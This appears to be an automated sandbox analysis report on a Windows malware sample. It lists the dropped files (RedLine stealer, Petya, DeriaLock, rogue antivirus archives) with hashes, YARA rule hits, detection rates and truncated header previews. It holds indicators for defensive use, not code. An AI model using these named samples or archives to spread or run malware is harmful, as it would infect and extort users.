                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........hR....................................................................................Rich............................PE..d................." ......0...................................................>......|>...`A.........................................^;..$....;......@=......0<..............`>..0..0Z2.T.............................1...............1..............................text...w.0.......0................. ..`.rdata..4.....0.......0.............@..@.data....o....;..0....;.............@....pdata.......0<.......;.............@..@.rsrc........@=.......<.............@..@.reloc...0...`>..2....=.............@..B........................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):267776
                                                                                                        Entropy (8bit):7.535290233283343
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:vDKW1LgppLRHMY0TBfJvjcTp5XxG8pt+oSOpE22obq+NYgvPuCEbMBWJxLRiUgV:vDKW1Lgbdl0TBBvjc/M8n35nYgvKjdzi
                                                                                                        MD5:7D80230DF68CCBA871815D68F016C282
                                                                                                        SHA1:E10874C6108A26CEEDFC84F50881824462B5B6B6
                                                                                                        SHA-256:F4234A501EDCD30D3BC15C983692C9450383B73BDD310059405C5E3A43CC730B
                                                                                                        SHA-512:64D02B3E7ED82A64AAAC1F74C34D6B6E6FEAAC665CA9C08911B93EDDCEC66595687024EC576E74EA09A1193ACE3923969C75DE8733859835FEF45335CF265540
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe, Author: ditekSHen
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 88%
                                                                                                        • Antivirus: Metadefender, Detection: 66%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~.................W....PE..L...t..P..........#..........z....../.............@..........................`.......;..........................................P....`..................................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2007552
                                                                                                        Entropy (8bit):7.761090155030316
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:49152:p/VoMTzwF77l0VqmuTefhLTtk31XyXb9:ptoMTzwVmq3ettk31ob9
                                                                                                        MD5:CB02C0438F3F4DDABCE36F8A26B0B961
                                                                                                        SHA1:48C4FCB17E93B74030415996C0EC5C57B830EA53
                                                                                                        SHA-256:64677F7767D6E791341B2EAC7B43DF90D39D9BDF26D21358578D2D38037E2C32
                                                                                                        SHA-512:373F91981832CD9A1FF0B8744B43C7574B72971B5B6B19EA1F4665B6C878F7A1C7834AC08B92E0ECA299EB4B590BF10F48A0485350A77A5F85FC3D2DD6913DB3
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 37%
                                                                                                        • Antivirus: Metadefender, Detection: 36%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,7.M.................H...V.......f... ........@.. ....................... ............@..................................f..K.......@P........................................................................... ............... ..H............text....F... ...H.................. ..`.sdata...............L..............@....rsrc...@P.......R...N..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):230912
                                                                                                        Entropy (8bit):6.8803725877131
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:DCyjXhd1mialK+qoNr8PxtZE6x5v+k6f:rjXhd8ZlKOrMZE6x5b6f
                                                                                                        MD5:AF2379CC4D607A45AC44D62135FB7015
                                                                                                        SHA1:39B6D40906C7F7F080E6BEFA93324DDDADCBD9FA
                                                                                                        SHA-256:26B4699A7B9EEB16E76305D843D4AB05E94D43F3201436927E13B3EBAFA90739
                                                                                                        SHA-512:69899C47D0B15F92980F79517384E83373242E045CA696C6E8F930FF6454219BF609E0D84C2F91D25DFD5EF3C28C9E099C4A3A918206E957BE806A1C2E0D3E99
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: Petya_Ransomware, Description: Detects Petya Ransomware, Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe, Author: Florian Roth
                                                                                                        • Rule: Ransom_Petya, Description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe, Author: CCN-CERT
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 100%
                                                                                                        • Antivirus: Metadefender, Detection: 84%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\..}\..}\..}Q..}...}Q.!}B..}Q..}...}...}^..}..0}X..}..5}}..}\..}...}y..}9..}Q.%}]..}y. }]..}Rich\..}................PE..L......V.................p...B......oq............@.................................E\.......................................*...................................#......8...............................@............................................text...5o.......p.................. ..`.rdata...............t..............@..@.data...@I...P.......6..............@....rsrc................P..............@..@.reloc...#.......$...b..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):835669
                                                                                                        Entropy (8bit):7.967994410818332
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:De/2dxVZ+ivtwdeOkD5YNfEp5UOc1+A4cMfZIYMlBlfwFyfr7BM9G/9V:6/iBFSkyNfI51cQFhMlvIofZRn
                                                                                                        MD5:7DFBFBA1E4E64A946CB096BFC937FBAD
                                                                                                        SHA1:9180D2CE387314CD4A794D148EA6B14084C61E1B
                                                                                                        SHA-256:312F082EA8F64609D30FF62B11F564107BF7A4EC9E95944DFD3DA57C6CDB4E94
                                                                                                        SHA-512:F47B05B9C294688811DD72D17F815CCE6C90F96D78F6835804D5182E2F4BFBD2D6738DE854B8A79DEA6345F9372BA76A36920E51E6CB556EF4B38B620E887EB4
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                        • Antivirus: Metadefender, Detection: 64%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<...].,.].,.].,.%f,.].,.%p,.].,.%`,.].,.].,.\.,.%w,.].,.,.].,.%g,.].,.%b,.].,Rich.].,................PE..L...G._U.................D....W..............`....@..........................``.............................................(.........`..G...........................................................................`..x............................text...VC.......D.................. ..`.rdata.......`.......H..............@..@.data...0.V..@...H...$..............@....data2..x.....`......l..............@....rsrc....G....`..H...x..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):495616
                                                                                                        Entropy (8bit):6.338057450703654
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:lqHKx3YCgy8HmmjJpnVhvLqCO3bLinIz1wASx:lqHoyHNj/nVhvLcyII
                                                                                                        MD5:0A7B70EFBA0AA93D4BC0857B87AC2FCB
                                                                                                        SHA1:01A6C963B2F5F36FF21A1043587DCF921AE5F5CD
                                                                                                        SHA-256:4F5BFF64160044D9A769AB277FF85BA954E2A2E182C6DA4D0672790CF1D48309
                                                                                                        SHA-512:2033F9637B8D023242C93F54C140DD561592A3380A15A9FDC8EBFA33385FF4FC569D66C846A01B4AC005F0521B3C219E87F4B1ED2A83557F9D95FA066AD25E14
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe, Author: Joe Security
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                        • Antivirus: Metadefender, Detection: 69%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`X............................~.... ... ....@.. ....................... ............`.................................$...W....@.............................. ............................................... ............... ..H............text........ ...................... ..`.sdata..8.... ......................@....rsrc.......@......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):576
                                                                                                        Entropy (8bit):7.692871468084152
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:p4tkjtpIhwhyS/s2NWJxmLgUK3R/abmwwKk9T7sNua6Wbovq45BAT8eLAp:R/hX/bNWJxmKwwT9TT3WbovP5B28dp
                                                                                                        MD5:837051A48757DCB80E24E5E109BFA67A
                                                                                                        SHA1:E57CEA1284CD8AEC2D8D45FD8B9FF10AE01414CB
                                                                                                        SHA-256:CD0E49B228ABED6B94D834165F53672293D333433A403E0F2048378AC3EFFDD5
                                                                                                        SHA-512:B9599E15EFBCFF7827A5FAD351C2A92C4D787DB55D57029F7C58A336D28CAF950980B9792D3DA92658E59E4AF1B8997003EC0D218E218B0AAF19A321652C7BFC
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:fS.WOU...".....*.I.i......hqSA..B........hMlw.o7...u.u_.X.@.)....>9H....)..$J).K.U=.Q/.......V........P...e}..|..v;.U..'&.L.9...l...7..LP......].i.6[.. {..h2...R..)B@.Y.=N...6...,.u...jqMM...3;.l.... ......{0.IU.x~.I...Q.?_._.5...$<..~L....#......G..Bd4..>....-JK..m.z............E.....o......B&.... .u5s.^...83Xt.U.Ys....r.ZV...(..v;..'.E..m....-.L"j](....bj.$o.UI|.....!.i...!.....TY....r.Si..K9.F..&.G.uK...rf|.....zh-..[......2l.Y;hk4i..x.......LG...F...Zv..i.We.M..H+r.....|*.6n..Q.u.5.....F.....Q.#..3vv..W.(Q.D.,.9...w....).c...\.'..j...y.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):464
                                                                                                        Entropy (8bit):7.573869979213362
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:p4tkjtpIhwhyS/snnTQLyh2+MGNwML/6bCsEybcI0P:R/hX/qTsyhTvNz/6bCsFbcI6
                                                                                                        MD5:1B67028CFB5DBF7F9AC667961AA01E05
                                                                                                        SHA1:1B1A2D6081011BCEC3B943DFF731F0F7758A7257
                                                                                                        SHA-256:4A2F68B624E00573DA670CB6EFB296991AF88F92A8845A29B3D9A3B4B5BDFD00
                                                                                                        SHA-512:9506486BD8E3827A8ED2C4EEF6FF7FB6C4C6E2199AC545F9C7C31F88045A11BB69B6E530050B54BCA49BEE9D3AE80D6856390D3CFA00680D57DEDEFA4A5B0437
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:fS.WOU...".....*.I.i......hqSA..B........hMlw.o7...u.u_.X.@.)....>9H....)..$J).K.U=.Q/.......V........P...e}..|..v;.U..'&.L.9...l...7..LP......].i.6[..,/.u_;.L{.]1#..Z..;.7H.{TG...H...C. . G!...4..R._`F..0.P.....S..82..6.....Z.i..6SoD$X.7_.%.f+..v....G......P$.dV.p......"..i.c..wx...Nd.8.._k.y.7..N.....I.&...GS.-.Z...!.d[E..U.x...l....)......3.g..:......L=.O.\v,T.......X........HG.{.do..r.....T....@l..|^....^.I%.C .d.I....K[.>..........
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):176
                                                                                                        Entropy (8bit):6.9521349566194415
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:6C3js1tDyFyHN+vXSLl4/pIQdyhZS+lHhUtz1c4uw97ac8yEEWS/skmZhifz0n:6C3ot8qN+vXSLWtpIS8wh9NSS/ssz0n
                                                                                                        MD5:89A8BD5FAE5B24BF30A379648860BA2A
                                                                                                        SHA1:5BBEDA0ADB8B34488E4BF8134D15F7A3750C26F0
                                                                                                        SHA-256:C747840172E684EAC2976B0E962647492BF2A26C62A0CCDACB3288144054959C
                                                                                                        SHA-512:09E6BCBE9384AD297DDE45361C6CA42DD87DE6E177970BAFDCEBAD6D666F76073EB4319F58F03D7C1605EF9FD66BB5BEE1F8C76761A554AE88CB41446B9E7765
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:fS.WOU...".....*.I.i......hqSA..B........hMlw.o7...u.u_.X.@.)....>9H....)..$J).K.U=.Q/.......V........P...e}..|..v;.U..'&.L.9...l...7..LP......].i.6[.C>..dq.....$..
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):800
                                                                                                        Entropy (8bit):7.744246704851039
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:p4tkjtpIhwhyS/s4TNtkNhTVEUAnTvw4l3roP8PkNKz+xkHblJDRGr08KPItBnvv:R/hX/z/4EUArxlbGQ1Go8KPI7nvIsh1F
                                                                                                        MD5:56C59953574483E7E9551B0FD98C5E6D
                                                                                                        SHA1:13D36184C92CDBDEDC08B553B17D94916E2A3C7F
                                                                                                        SHA-256:02F71208306025B9F44A4250A761962344EE22D341925E4E56D567C77A4FD6C4
                                                                                                        SHA-512:A879C975076BC9A3FDB016E6F0EA50428864B1921DBDEFD62A822D70CCD88E39A73C5ADFC7B9912D4A8C0194247E8D421728E685ED015199766779583F81B89D
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:fS.WOU...".....*.I.i......hqSA..B........hMlw.o7...u.u_.X.@.)....>9H....)..$J).K.U=.Q/.......V........P...e}..|..v;.U..'&.L.9...l...7..LP......].i.6[.....)Q.4...i......b.&`g.......x.7.z..R(..ci..A..oz.X....^...aM?..E.+1.$..Y...ej.i.}%Z..(-)h....9....8.w ....B..U.D...K04.Z.C.!..nj.2ug.......s".F.s.n0...<%r..d1NP....=.b....>...q..N.[...h@.4.&..FN_..a..Y..W_...;..._...e..g4kn.{_.+..L....6%cky..c.@j..i...t.......2&...d.......^<T:i.2.s.L.AB...q...`!7...H..~.#...<h.....n~jY..Th.#c|.C...Z.b.|....P..p.~V.7P..O..nq.%..u.Do....4.W.O...P......u...+4I.p.Y..*..F#A.)....TK....?du.....S..7.x\.^..E{E.......+.^....f.i.jl...6j.y.Z6..a....b\.i...|i.NkSA..G..!...H....?.......z..`x.....6?...-.t....O.5..w..Lw....O.3.6.>..7{....4..6..5.c$..2.../.....v......t..^.8H.[..T...*.=
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe
                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Title: Installation Database, Keywords: Installer, MSI, Database, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Number of Pages: 200, Security: 0, Code page: 1252, Revision Number: {CA900EFE-690D-4598-B89E-0D9BD5216C79}, Number of Words: 0, Subject: Error file remover, Author: Windows, Name of Creating Application: Advanced Installer 12.4.2 build 66135, Template: ;1033, Comments: This installer database contains the logic and data required to install Error file remover.
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1034240
                                                                                                        Entropy (8bit):6.442854593944908
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:yAgEr3Zw5abtZ3L60uRaCXEYDmbnreAgC:PgxabtZ320uRa+EYDmbreAg
                                                                                                        MD5:27BC9540828C59E1CA1997CF04F6C467
                                                                                                        SHA1:BFA6D1CE9D4DF8BEBA2BEDF59F86A698DE0215F3
                                                                                                        SHA-256:05C18698C3DC3B2709AFD3355AD5B91A60B2121A52E5FCC474E4E47FB8E95E2A
                                                                                                        SHA-512:A3AE822116CDDB52D859DE7FFC958541BB47C355A835C5129AADE9CC0E5FBA3FF25387061DEB5B55B5694A535F09FE8669485282EB6E7C818CC7092EB3392848
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:......................>.......................................................U...........................................................................................................................................................................................................................................................................................................................................................................................................................................................)...................................................................(....................................... ...#...!..."...$...F...%...&...'...+...*.......7...,...-......./...0...1...2...3...4...5...6...-...K...9...:...;...<...=...>...?...@...A...B...C...D...E.......G...H...I...J...,...L...M...N...O...P...Q...R...S...T...........W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe
                                                                                                        File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 22050 Hz
                                                                                                        Category:dropped
                                                                                                        Size (bytes):741966
                                                                                                        Entropy (8bit):7.030207041227603
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:Avw1QKgDpt4/U3xid1CzNVT+DY3YmTEytodUmvnR:b1Q8/UBiKpZY6jtc
                                                                                                        MD5:BAB1293F4CF987216AF8051ACDDAF97F
                                                                                                        SHA1:00ABE5CFB050B4276C3DD2426E883CD9E1CDE683
                                                                                                        SHA-256:BC26B1B97EEB45995BBD5F854DB19F994CCE1BB9AC9FB625EB207302DCCDF344
                                                                                                        SHA-512:3B44371756F069BE4F70113A09761A855D80E96C23C8CD76D0C19A43E93D1A159AF079BA5189B88B5EE2C093099A02B00EA4DC20A498C9C0C2DF7DC95E5DDD49
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:RIFFFR..WAVEfmt ........"V..D.......LIST....INFOISFT....Lavf57.36.100.data.R............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):24576
                                                                                                        Entropy (8bit):3.492561660009355
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:/lxmXVZV52WcuHiPbclq6t2YayIj+WJjR9jutoCPrLDpKVZClILvBUZneUwNQzsw:/TO5TcywKHPfDwvOT3wjSPekd5D2KbZP
                                                                                                        MD5:E579C5B3C386262E3DD4150EB2B13898
                                                                                                        SHA1:5AB7B37956511EA618BF8552ABC88F8E652827D3
                                                                                                        SHA-256:E9573A3041E5A45ED8133576D199EB8D12F8922BBE47D194FEF9AC166A96B9E2
                                                                                                        SHA-512:9CF947BAD87A701F0E0AD970681767E64B7588089CD9064C72BF24BA6CA0A922988F95B141B29A68AE0E0097F03A66D9B25B9D52197FF71F6E369CDE0438E0BB
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................H...........".....Rich..........PE..L....r`W.................0... ...............@....@..........................`.......C.......................................4..(....P......................................................................(... ....................................text....(.......0.................. ..`.data........@.......@..............@....rsrc........P.......P..............@..@l.[J............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe
                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):129816
                                                                                                        Entropy (8bit):6.5491938422970915
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:pJzYRnR1UrYpMxbkpG2/wI/Bf6zWcvEm+6MG:zYPqrKM5kA2jy
                                                                                                        MD5:3531CF7755B16D38D5E9E3C43280E7D2
                                                                                                        SHA1:19981B17AE35B6E9A0007551E69D3E50AA1AFFFE
                                                                                                        SHA-256:76133E832C15AA5CBC49FB3BA09E0B8DD467C307688BE2C9E85E79D3BF62C089
                                                                                                        SHA-512:7B053BA2CF92EF2431B98B2A06BD56340DAD94DE36D11E326A80CD61B9ACB378AC644AC407CF970F4EF8333B8D3FB4FF40B18BB41EC5AEE49D79A6A2ADCF28FD
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w..............n9......n(......n>......n...............n7......n/......D)......n,.....Rich....................PE..L.....V...........!.....d...|......'........................................p............@.........................P.......0...<....0.......................@..........................................@...............D............................text....b.......d.................. ..`.rdata...<.......>...h..............@..@.data...L`..........................@....rsrc........0......................@..@.reloc...%...@...&..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):766542
                                                                                                        Entropy (8bit):0.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3::
                                                                                                        MD5:0E7079D29F5BE29C8406DE6F4FD175F2
                                                                                                        SHA1:1BFEB2484B7C35F43D37ABC79DAAD274BE4B27CD
                                                                                                        SHA-256:205D938ED0540A568E5F1150CC37A733CB76E7945A17A56CA57715419B9EC87F
                                                                                                        SHA-512:868AA6165BEA41B096F2B9AA1C4DEB5134CB5CE4B09999E7DE7323AC1EC8906B3ADA7760EA0382D4D245BD2B42264C36AC5B1DDB2145151CDE673100A92A1F4D
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1178406
                                                                                                        Entropy (8bit):7.999833834152535
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:24576:lKTP6/tHWoQQRakFbfVKqycdGiazlXVyQ8MiSIxjlTGPje9V4iuquGGspoLA:lK4WDQRaklfVKJcd7MXVlPiZlTejkV42
                                                                                                        MD5:9A38C29FF9E12BA2892381EB51C79934
                                                                                                        SHA1:76FCF6BCAAC32F624FA0154A9177E44469B5886A
                                                                                                        SHA-256:45B75A116AA3B07F90A7C2D9A83C2CDE524797DF88BB5E20F9DC1E74D8527861
                                                                                                        SHA-512:C26D8C252D6F18A2AE4419BBFE27099862A625CBC40D8F104FA20CB361DA112EBE6A17935AC3613C24B58F9C291D2219E55F59E0FA40B81F92FCCF190115E734
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK..3...c..\.<....X...Z.......Endermanch@AnViPC2009.exe......AE.........-4x5...B.....]..<..}./a..(.q\.{|0....<.{..._..:.....C:.....<R..\]..x.e.S*.AM.2.....!....T..y..u..2._p.N.....Sr..../1..o.2....&..U.D...z%..I..Rn..r.0.........m.,`.Q.......<..6..EB..v7f.,X..x..)1.-"............{...<..>....%|.C...dID...hR.OD.....w.<@..C...6....U;W$..e.....q..!.,.Y;.>.'K...C..Y.J.Q..h.~..f...3...D..C....1.PG..E..%...#-T.<.B..:X...>.SF..2x.S......z..5....1]....c...h.....]....:.WWL...RWV.;.=..?.....S..Of...'......oa..%........8AQ.y...p...X/x.2g._.V.6.fL.~......:..x...........tB.V~..0.v.....uO3..............$.Z...n.b-..P*:$......U.....U.B...O..}..L....3.n..@.......nz.q'.l...z_....e..l.6....{.....>...|%6..;..}o..p[..X.....}..Z.(..7J......l...kb...rHib......1.*...*..m..,.1.p,..FM]AaE....P.+..*M...`XhK.s87P.2Hc.....*.......PY.m.x:OO......&~#..@...}J..B.uq.\.v.fE.p....(.G\!.. X..0....I...Y..mw.Bg.\.R..K..vV.C..lT.wT...o2...Y"(M..,.}.k...@b.8.(.%..K...YT.34[o|.[.
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                        Category:dropped
                                                                                                        Size (bytes):716432
                                                                                                        Entropy (8bit):7.999718752172075
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:12288:pKAT6gPoHT7CzZy7fmzVyaF3zA0mKz8doC3m/LuXCC32H+REYWzTdjhoMlX1Q4QM:2gPoHT7CtEfwyaFDAjKz8Bm/LYC+3uYi
                                                                                                        MD5:FF84853A0F564152BD0B98D3FA63E695
                                                                                                        SHA1:47D628D279DE8A0D47534F93FA5B046BB7F4C991
                                                                                                        SHA-256:3AAA9E8EA7C213575FD3AC4EC004629B4EDE0DE06E243F6AAD3CF2403E65D3F2
                                                                                                        SHA-512:9EA41FE0652832E25FE558C6D97E9F9F85CCD8A5F4D00DBCC1525A20A953FBD76EFB64D69CE0FDD53C2747159D68FCB4AC0FA340E0253B5401AEBC7FB3774FEB
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK.........P><..(........ ...Endermanch@AntivirusPlatinum.exe#.J...3.....f.........r.......G2[X...4......1|...(.....ZG4..X...I..v......Aa.54.yE....MhG..'..e`......&....TXA\........"{5....UqD.i.H........f......@y".}{.....u.....%.V/t..+.=.A1.A.C.T......O..c..2..+....2C64.....f>a...#.\b.4Z._.)....II0.....{n......6x.[.......#O#.... ....jY..*...S..q1. ..7.....`.......IA....v..K.7.'..TXI....l.....vP#.;x.'z.......geZ.z..J..R.AV....U.8`.Zy...a.i.$L....x...9..w..:..4.c........>.a.P`.A. ...8g.=A.....u..#..V.uz.7.".6.G..kv.....p.<.L0.VZpw......?.:...E.v.Vt.c.6..e.Vw[.+.......].%..RSFN....._.%.$.m.{....n....E,7...S.!.....!...;.nH..MQ..5.............zA.....h....P..M..@..[....C..hYN.pF3O=.Kb.j.V...z.i..>YE.q....V~V.g.....7.._Ucwn=]..8.!..>[&.q.98.....y......x..d.l..... '.k.Z..f......XrpMf.y.p....97./...=5../.#.<.>h@..e............K.6.\...>...~.........q{......6...'.{".U..90.oI..zO........%.-..4.kK...D...3...]S.K(.O......).....a...cutT..<.......f.v..8.
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                        Category:dropped
                                                                                                        Size (bytes):813771
                                                                                                        Entropy (8bit):7.999770789356288
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:24576:5AKFQL3t2IUmZwXlgqEKUhHgQeX8k22QO:auQLQ6wmqESzPQO
                                                                                                        MD5:AB1187F7C6AC5A5D9C45020C8B7492FE
                                                                                                        SHA1:0D765ED785AC662AC13FB9428840911FB0CB3C8F
                                                                                                        SHA-256:8203F1DE1FA5AB346580681F6A4C405930D66E391FC8D2DA665AC515FD9C430A
                                                                                                        SHA-512:BBC6594001A2802ED654FE730211C75178B0910C2D1E657399DE75A95E9CE28A87B38611E30642BAEAE6E110825599E182D40F8E940156607A40F4BAA8AEDDF2
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
